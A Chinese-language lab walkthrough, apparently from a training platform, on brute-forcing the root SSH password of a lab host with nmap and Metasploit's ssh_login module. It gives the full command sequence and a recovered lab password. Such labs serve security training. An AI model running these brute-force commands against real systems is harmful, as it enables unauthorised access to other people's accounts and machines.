Metasploit对目标主机SSH爆破

Metasploit对目标主机SSH爆破

实验原理：
    1) 靶机root用户存在弱口令漏洞，利用枚举的方法破解目标主机ssh服务。

实验步骤：

一、利用nmap工具扫描目标主机
    1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处，右键菜单选择“在终端中打开”。
    1.2 在终端中输入命令“nmap –sV  -O 192.168.1.3”，对目标主机进行端口扫描，发现开放22端口。
    1.3 在终端中输入命令“msfconsole”，启动MSF终端
    1.4 在终端中输入命令“search ssh_login”，搜索ssh_login的相关工具和攻击载荷。
    1.5 在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”，启用漏洞利用模块, 提示符就会提示进入到该路径下。
    1.6 在终端中输入命令“show options”，查看需要设置的相关项，“yes”表示必须填写的参数。
    1.7 在终端中输入命令“set RHOST 192.168.1.3”，设置目标主机的IP地址。
    1.8 在终端中输入“set USERNAME root”，指定登陆用户名root。
    1.9 在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径。
    1.10 在终端中输入“set THREADS 50”,设置暴利破解的线程数为50。
    1.11 在终端中输入“run”, 开始向目标主机爆破ssh的登陆帐号和密码，登陆帐号为root,密码为Simplexue123。
    1.12 在终端中输入“ssh [email protected]”,连接目标主机，然后查看网卡信息。